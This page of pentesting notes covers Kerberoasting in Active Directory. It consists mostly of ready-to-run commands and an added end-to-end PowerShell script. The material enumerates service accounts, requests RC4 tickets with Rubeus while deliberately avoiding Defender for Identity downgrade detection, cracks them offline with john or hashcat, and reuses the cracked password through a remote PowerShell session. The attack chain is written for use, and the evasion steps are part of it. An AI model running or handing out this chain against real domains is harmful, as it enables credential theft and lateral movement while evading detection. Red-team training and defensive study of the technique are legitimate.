Pentesting and Red Teaming Notes

Kerberoasting

Kerberoasting is an attack against service accounts. A service ticket (TGS) is encrypted with the long-term key of the account that runs the service (for RC4_HMAC tickets that key is the account's NTLM hash), and any authenticated domain user can request a service ticket for any registered SPN. In this attack we request such tickets from the Ticket Granting Service on the DC, export them, and crack the encrypted part offline with hashcat (mode 13100 for RC4 tickets) or john (krb5tgs format) to recover the service account's plaintext password. The targets are always user accounts that carry an SPN: computer accounts and managed service accounts have long random passwords generated by the DC and rotated automatically (every 30 days by default), so they are impractical to crack.

Find user accounts used as Service accounts

  • Using AD module

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
  • Using PowerView

Get-DomainUser -SPN
  • Using rubeus to list kerberoast stats

Rubeus.exe kerberoast /stats
  • Use Rubeus to request a service ticket (ST) for a specific account and write the crackable hash to a file

Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
  • To avoid detections based on encryption downgrade for Kerberos EType (used by tools like Microsoft Defender for Identity; EType 0x17 is rc4-hmac), target only kerberoastable accounts that do not support AES, i.e. that only support RC4_HMAC. Rubeus's /rc4opsec flag filters for exactly those accounts, so no downgrade from AES to RC4 is visible in the TGS request

Rubeus.exe kerberoast /stats /rc4opsec 
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
  • Kerberoast all possible accounts

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
  • Crack the ticket using john the ripper (john auto-detects the krb5tgs format; hashcat -m 13100 works on the same $krb5tgs$23$ lines)

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
  • Once a password is recovered, create a PowerShell credential object for the service account and use Enter-PSSession to access a computer where that account has local admin rights or is otherwise allowed to log on.
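The full procedure above (enumerate SPN users, pick the ones that cannot do AES, roast them, crack, and reuse the password) as one added PowerShell example; this is not code from the original notes. It assumes the RSAT ActiveDirectory module is loaded, that Rubeus.exe and john.exe sit under C:\AD\Tools as in the commands above, and the account name svcadmin, domain dcorp and host dcorp-mgmt are hypothetical placeholders.

```powershell
# Added example, not part of the original notes. Assumptions: RSAT AD module available,
# Rubeus.exe / john.exe under C:\AD\Tools, and 'svcadmin', 'dcorp', 'dcorp-mgmt' are
# hypothetical names to be replaced with real ones.

Import-Module ActiveDirectory

# 1. Enumerate user accounts with an SPN together with their supported encryption types.
#    msDS-SupportedEncryptionTypes bits: 4 = RC4_HMAC, 8 = AES128, 16 = AES256.
#    An empty/0 value means the DC default, which is RC4 for user accounts.
$spnUsers = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} `
    -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes'

# 2. Keep only accounts that cannot do AES: roasting them as RC4 is not a downgrade,
#    so MDI-style "encryption downgrade" detections have nothing to flag.
$rc4Only = $spnUsers | Where-Object {
    $etypes = $_.'msDS-SupportedEncryptionTypes'
    (-not $etypes) -or (($etypes -band 24) -eq 0)   # neither AES128 nor AES256 bit set
}

$rc4Only |
    Select-Object SamAccountName, 'msDS-SupportedEncryptionTypes',
        @{ n = 'SPNs'; e = { $_.ServicePrincipalName -join ';' } } |
    Format-Table -AutoSize

# 3. Request an RC4 service ticket per selected account (Rubeus /rc4opsec) and append
#    the $krb5tgs$23$ lines to one file. Targeting named accounts keeps the number of
#    TGS requests (event 4769 on the DC) to what is actually needed.
$hashFile = 'C:\AD\Tools\hashes.txt'
foreach ($u in $rc4Only) {
    & 'C:\AD\Tools\Rubeus.exe' kerberoast "/user:$($u.SamAccountName)" /simple /rc4opsec "/outfile:$hashFile"
}

# 4. Crack offline. john auto-detects the krb5tgs format; the hashcat equivalent is
#    hashcat -m 13100 -a 0 C:\AD\Tools\hashes.txt C:\AD\Tools\kerberoast\10k-worst-pass.txt
& 'C:\AD\Tools\john.exe' --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt $hashFile
& 'C:\AD\Tools\john.exe' --show $hashFile

# 5. Reuse a recovered password: build a PSCredential and open a remote session on a host
#    where the service account is a local administrator.
$plain  = Read-Host -Prompt 'Cracked password for svcadmin'
$secure = ConvertTo-SecureString $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('dcorp\svcadmin', $secure)
Enter-PSSession -ComputerName dcorp-mgmt -Credential $cred
```

If every SPN user turns out to support AES, step 3 yields nothing; at that point the choice is between requesting AES tickets (much slower to crack, hashcat modes 19600/19700) or accepting the downgrade and the detection risk that comes with it.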


Last updated 10 months ago